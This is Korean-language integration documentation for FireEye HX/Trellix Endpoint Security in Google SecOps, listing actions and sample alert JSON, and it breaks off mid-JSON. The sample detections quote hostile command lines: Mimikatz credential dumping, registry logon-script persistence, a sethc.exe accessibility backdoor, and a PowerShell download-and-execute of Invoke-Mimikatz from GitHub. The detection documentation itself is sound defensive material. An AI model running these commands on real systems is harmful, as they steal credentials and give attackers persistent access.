FireEye HX
통합 버전: 17.0
Google Security Operations에서 FireEye HX 통합 구성
Google SecOps에서 통합을 구성하는 방법에 대한 자세한 내용은 통합 구성을 참고하세요.
통합 매개변수
다음 매개변수를 사용하여 통합을 구성합니다.
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 인스턴스 이름 | 문자열 | 해당 사항 없음 | No | 통합을 구성할 인스턴스의 이름입니다. |
| 설명 | 문자열 | 해당 사항 없음 | No | 인스턴스에 대한 설명입니다. |
| 서버 | 문자열 | https://x.x.x.x:<port> | 예 | Trellix Endpoint Security 인스턴스의 주소입니다. |
| 사용자 이름 | 문자열 | 해당 사항 없음 | 예 | Trellix Endpoint Security에 연결하는 데 사용할 사용자의 이메일 주소입니다. |
| 비밀번호 | 비밀번호 | 해당 사항 없음 | 예 | 해당 사용자의 비밀번호입니다. |
| SSL 확인 | 체크박스 | 선택 | No | Trellix Endpoint Security 연결에 SSL 확인이 필요한 경우 이 체크박스를 사용합니다(기본적으로 선택됨). |
| 원격 실행 | 체크박스 | 선택 해제 | No | 구성된 통합을 원격으로 실행하려면 필드를 선택합니다. 선택하면 원격 사용자(에이전트)를 선택하는 옵션이 나타납니다. |
작업
취소 호스트 포함
설명
Google SecOps IP 또는 호스트 Google SecOps 엔티티를 기반으로 Trellix Endpoint Security 서버의 태스크를 포함하는 취소 호스트를 만듭니다.
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
N/A
포함 호스트
설명
Google SecOps IP 또는 호스트 Google SecOps 엔티티를 기반으로 Trellix Endpoint Security 서버에서 포함 호스트 태스크를 만듭니다.
매개변수
| 매개변수 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 격리 승인 | 체크박스 | 선택 해제 | No | Trellix Endpoint Security 서버에서 포함 호스트 태스크를 만들도록 호스트에 대한 격리 요청을 자동으로 승인해야 하는지 여부를 지정합니다. 자동으로 승인되지 않으면 Trellix Endpoint Security 웹 콘솔에서 격리 요청을 승인할 수 있습니다. |
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
N/A
알림 받기
설명
제공된 Google SecOps 항목 및 검색 조건을 기반으로 Trellix Endpoint Security 알림을 가져옵니다. 이 작업은 호스트 또는 IP Google SecOps 항목에서 작동합니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 한도 | 정수 | 해당 사항 없음 | No | 작업이 반환할 알림 수입니다(예: 100). |
| 공유 모드 있음 | _(default = any)_ 드롭다운 목록 | _default = any_ | No | 특정 공유 모드를 사용하는 지표에서 트리거된 알림을 필터링합니다. 사용 가능한 값: any, restricted , unrestricted |
| 알림 해결 상태 | _(default = any)_ 드롭다운 목록 | _default = any_ | No | 알림 해결 상태를 기준으로 알림을 필터링합니다. 사용 가능한 값: any, active_threat, alert, block, partial_block |
| 지난 x시간 동안 신고된 알림 | 정수 | 해당 사항 없음 | No | 지난 x시간(예: 지난 4시간) 동안 보고된 알림을 필터링합니다. |
| 알림 소스 | _(default = any)_ 드롭다운 목록 | _default = any_ | No | 알림 소스입니다. 사용 가능한 값: any, exd(취약점 공격 감지), mal(멀웨어 알림), ioc(침해 지표) |
| 조건 ID | 문자열 | 해당 사항 없음 | No | 특정 조건 식별자로 알림을 필터링합니다. |
| 알림 ID | 문자열 | 해당 사항 없음 | No | 경고 식별자로 특정 경고를 반환합니다. |
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
[
{
"EntityResult": [{
"indicator": {
"category": "Mandiant",
"display_name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
"signature": null,
"_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
"uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
},
"event_id": 12880,
"event_values": {
"processEvent/processCmdLine": "at 13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
"processEvent/parentPid": 4832,
"processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
"processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/timestamp": "2020-05-29T10:21:03.419Z",
"processEvent/startTime": "2020-05-29T10:21:03.419Z",
"processEvent/process": "at.exe",
"processEvent/username": "DOMAIN-COM\\\\Administrator",
"processEvent/pid": 7332,
"processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"processEvent/eventType": "start"
},
"event_type": "processEvent",
"subtype": null,
"reported_at": "2020-05-29T10:24:05.410Z",
"decorators": [],
"md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
"appliance": {
"_id": "86B7F11ACF8D"
},
"agent": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"containment_state": "normal"
},
"is_false_positive": false,
"event_at": "2020-05-29T10:21:03.419Z",
"source": "IOC",
"matched_at": "2020-05-29T10:23:22.000Z",
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/88",
"_id": 88,
"resolution": "ALERT",
"condition": {
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
"_id": "yirelRwhiuXlF0bQhTL4GA=="
},
"matched_source_alerts": []
}],
"Entity": "PC-01"
}
]
알림 그룹 세부정보 가져오기
설명
ID로 제공된 알림 그룹의 전체 알림 그룹 세부정보를 가져옵니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 알림 그룹 ID | 문자열 | 해당 사항 없음 | 예 | 세부정보를 가져올 알림 그룹 ID를 쉼표로 구분한 목록을 지정합니다. |
실행
이 작업은 항목에서 실행되지 않으며 필수 입력 매개변수가 있습니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
{
"details": [],
"route": "/hx/api/v3/alert_groups/id",
"data": {
"_id": "622d3688031aa40faa4bd86028841276",
"assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\reg.exe",
"first_event_at": "2020-08-06T06:32:55.761Z",
"last_event_at": "2020-08-06T06:32:55.761Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 729,
"agent": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"containment_state": "normal"
},
"condition": {
"_id": "yirelRwhiuXlF0bQhTL4GA==",
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
},
"event_at": "2020-08-06T06:32:55.761+00:00",
"matched_at": "2020-08-06T06:37:55+00:00",
"reported_at": "2020-12-18T14:03:18.856+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"05cf3ce225b05b669e3118092f4c8eab"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/729",
"event_id": 207,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-06T06:32:55.761Z",
"processEvent/eventType": "start",
"processEvent/pid": 10356,
"processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
"processEvent/process": "reg.exe",
"processEvent/parentPid": 9456,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-06T06:32:55.761Z",
"processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
"processEvent/processCmdLine": "REG ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
"created_at": "2020-12-18T14:03:24.535Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "yirelRwhiuXlF0bQhTL4GA==",
"detected_by": "ioc_engine",
"host": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"primary_ip_address": "172.30.202.55"
}
}
},
"message": "OK"
}
케이스 월
| 결과 유형 | 값/설명 | 유형 |
| 출력 메시지* | 1개 성공(is_success=true): Trellix Endpoint Security에서 {alert group ids} 알림 그룹에 대한 세부정보를 가져왔습니다. 1개 실패(is_success=true): 작업이 Trellix Endpoint Security에서 {alert group ids} 알림 그룹에 대한 세부정보를 가져올 수 없습니다. 모두 실패(is_success=false): Trellix Endpoint Security에서 제공된 알림 그룹을 전혀 찾을 수 없습니다. |
일반 |
| 케이스 월 | 이름: Alert Group Details(알림 그룹 세부정보)
|
일반 |
알림 그룹의 알림 가져오기
설명
지정된 알림 그룹에서 발견된 모든 알림을 가져옵니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 알림 그룹 ID | 문자열 | 해당 사항 없음 | 예 | 세부정보를 가져올 알림 그룹 ID를 쉼표로 구분한 목록을 지정합니다. |
| 한도 | 정수 | 50 | No | 알림 그룹에 대해 API에서 반환되는 알림 목록의 최대 개수를 지정합니다. 기본값은 50입니다. |
실행
이 작업은 항목에서 실행되지 않으며 필수 입력 매개변수가 있습니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": 712,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T08:04:09.521Z",
"matched_at": "2020-12-10T08:04:43.000Z",
"reported_at": "2020-12-10T08:04:49.607Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/712",
"event_id": 853899,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8800,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
},
{
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T09:26:14.114Z",
"matched_at": "2020-12-10T09:26:56.000Z",
"reported_at": "2020-12-10T09:27:08.735Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups/group_id/alerts"
}
케이스 월
| 결과 유형 | 값/설명 | 유형 |
|---|---|---|
| 출력 메시지* | 1개 성공(is_success=true): Trellix Endpoint Security에서 {alert group ids} 알림 그룹에 대한 세부정보를 가져왔습니다. 1개 실패(is_success=true): 작업이 Trellix Endpoint Security에서 {alert group ids} 알림 그룹에 대한 세부정보를 가져올 수 없습니다. 모두 실패(is_success=false): Trellix Endpoint Security에서 제공된 알림 그룹을 전혀 찾을 수 없습니다. |
일반 |
| 케이스 월 | 이름: 'Trellix Endpoint Security 알림 그룹 +{alert_group_id) 알림'
|
일반 |
호스트 정보 가져오기
설명
Trellix Endpoint Security의 정보를 기반으로 Google SecOps 호스트 또는 IP 항목을 보강합니다.
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
[
{
"EntityResult": {
"last_alert": {
"url": "/hx/api/v3/alerts/254",
"_id": 254
},
"domain": "EXAMPLE-COM",
"last_exploit_block_timestamp": null,
"containment_state": "normal",
"timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
"gmt_offset_seconds": 10800,
"initial_agent_checkin": "2020-05-29T10:11:12.022Z",
"stats": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"primary_mac": "00-50-56-11-22-33",
"hostname": "HW-HOST-025",
"primary_ip_address": "1.1.1.1",
"last_audit_timestamp": "2020-06-01T09:10:38.752Z",
"last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
"containment_queued": false,
"sysinfo": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
},
"last_exploit_block": null,
"reported_clone": false,
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"excluded_from_containment": false,
"last_poll_timestamp": "2020-06-01T09:10:36.000Z",
"last_poll_ip": "1.1.1.1",
"containment_missing_software": false,
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"os": {
"kernel_version": null,
"platform": "win",
"patch_level": null,
"bitness": "64-bit",
"product_name": "Windows 10 Pro"
},
"agent_version": "32.30.0"
},
"Entity": "PC-01"
}
]
지표 가져오기
설명
Trellix Endpoint Security 서버에서 특정 지표에 대한 정보를 가져옵니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 지표 카테고리 | 문자열 | 해당 사항 없음 | 예 | 지표 카테고리 uri_name 값을 지정합니다. uri_name은 '지표 가져오기' 작업을 실행하여 찾을 수 있습니다. |
| 지표 이름 | 문자열 | 해당 사항 없음 | 예 | 지표 uri_name 값을 지정합니다. uri_name은 '지표 가져오기' 작업을 실행하여 찾을 수 있습니다. |
실행
이 작업은 모든 항목에서 실행됩니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win\", \"osx\", \"linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
지표 가져오기
설명
제공된 검색 매개변수를 기반으로 Trellix Endpoint Security 서버에서 침해 지표(IOC)에 대한 정보를 가져옵니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 지표 카테고리 | 문자열 | 해당 사항 없음 | No | 지표 카테고리입니다. |
| 검색어 | 문자열 | 해당 사항 없음 | No | 검색어는 이름, 카테고리, 서명, 소스 또는 조건 값일 수 있습니다. |
| 한도 | 문자열 | 해당 사항 없음 | No | 작업이 반환할 지표 수입니다(예: 100). |
| 공유 모드 | _(default = any)_ 드롭다운 목록 | _default = any_ | No | 특정 공유 모드를 기반으로 지표를 필터링합니다. 사용 가능한 값: any, restricted, unrestricted |
| 필드 기준 정렬 | 문자열 | 해당 사항 없음 | No | 지정된 필드를 기준으로 결과를 오름차순으로 정렬합니다. |
| 생성자 | 문자열 | 해당 사항 없음 | No | 작성자를 기준으로 지표를 필터링합니다. |
| 연결된 알림 있음 | 체크박스 | 해당 사항 없음 | No | 연결된 알림이 있는 지표만 반환할지 지정합니다. |
실행
이 작업은 모든 항목에서 실행됩니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
[
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win", "osx", "linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
]
호스트의 파일 획득 목록 가져오기
설명
Trellix Endpoint Security 서버에서 호스트에 요청된 파일 획득 목록을 가져옵니다. 이 작업은 호스트 또는 IP Google SecOps 항목에서 작동합니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 검색어 | 문자열 | 해당 사항 없음 | No | Trellix Endpoint Security 서버에 연결된 호스트의 모든 파일 획득을 검색합니다. search_term은 모든 조건 값이 될 수 있습니다. |
| 한도 | 문자열 | 해당 사항 없음 | No | 작업이 반환할 레코드 수입니다(예: 100). |
| 필터 필드 | 문자열 | 해당 사항 없음 | No | 지정된 필드 값이 있는 결과만 나열합니다. 외부 상관관계 식별자(external_id)로 결과를 필터링할 수 있습니다. |
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
[
{
"EntityResult": [{
"comment": " ",
"zip_passphrase": "unzip-me",
"indicator": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"request_actor": {
"username": "admin",
"_id": 1000
},
"request_time": "2020-06-01T08:43:14.000Z",
"finish_time": "2020-06-01T08:46:39.156Z",
"_revision": "20200601084639156575147403",
"error_message": "The acquisition completed with issues.",
"req_use_api": false,
"alert": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"url": "/hx/api/v3/acqs/files/9",
"state": "COMPLETE",
"host": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id":
"FqNP4ybCdrlfVqG3lrCvRP"
},
"req_filename": "reg.exe",
"req_path": "C:\\\\Windows\\\\System32",
"_id": 9,
"external_id": null,
"condition": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"md5": "601bddf7691c5af626a5719f1d7e35f1"
}],
"Entity": "PC-01"
}
]
멀웨어 알림 포함 여부
설명
Trellix Endpoint Security 서버에서 제공된 Google SecOps 호스트 또는 IP 항목에 대해 멀웨어 알림이 나열되는지 확인합니다.
실행
이 작업은 다음 항목에서 실행됩니다.
- IP 주소
- 호스트 이름
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
[
{
"EntityResult": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"Entity": "PC-01"
}
]
핑
설명
Google Security Operations Marketplace 탭의 통합 구성 페이지에서 제공되는 매개변수를 사용하여 Trellix Endpoint Security 서버에 대한 연결을 테스트합니다.
실행
이 작업은 모든 항목에서 실행됩니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
N/A
알림 그룹 확인
설명
Google SecOps에서 처리하는 알림 그룹을 승인하여 HX 플랫폼과 Google SecOps 간의 동기화를 개선합니다.
매개변수
| 매개변수 표시 이름 | 유형 | 기본값 | 필수 항목 | 설명 |
|---|---|---|---|---|
| 알림 그룹 ID | 쉼표로 구분된 목록 | 해당 사항 없음 | 예 | 확인할 알림 그룹 ID를 쉼표로 구분된 목록으로 지정합니다. |
| 확인 | DDL | 확인 | 예 | 지정된 알림 그룹을 확인할지 또는 미확인할지 지정합니다. |
| 확인 의견 | 문자열 | 해당 사항 없음 | No | 관련 알림 그룹에 추가할 확인 의견을 지정합니다. |
| 한도 | 정수 | 해당 사항 없음 | No | JSON 결과로 API에서 반환되는 알림 그룹 목록의 최대 개수를 지정합니다. |
실행
이 작업은 항목에서 실행되지 않으며 필수 입력 매개변수가 있습니다.
작업 결과
스크립트 결과
| 스크립트 결과 이름 | 값 옵션 | 예시 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON 결과
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": "4532f4d8d50ab50a7830e2823ac488fd",
"assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2020-08-17T12:03:38.496Z",
"last_event_at": "2020-12-10T08:02:22.561Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 718,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
},
"event_at": "2020-08-17T12:03:38.496+00:00",
"matched_at": "2020-12-10T09:26:55+00:00",
"reported_at": "2020-12-10T09:27:08.624+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"cda48fc75952ad12d99e526d0b6bf70a"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/718",
"event_id": 39882,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-17T12:03:38.496Z",
"processEvent/eventType": "start",
"processEvent/pid": 9896,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 5560,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-17T12:03:38.496Z",
"processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
"processEvent/processCmdLine": "powershell.exe \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\" "
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 3
},
"url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
"created_at": "2020-12-10T09:26:56.056Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
},
{
"_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
"assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"file_full_path": "",
"first_event_at": "2020-12-10T08:04:09.521Z",
"last_event_at": "2020-12-10T09:26:14.114Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
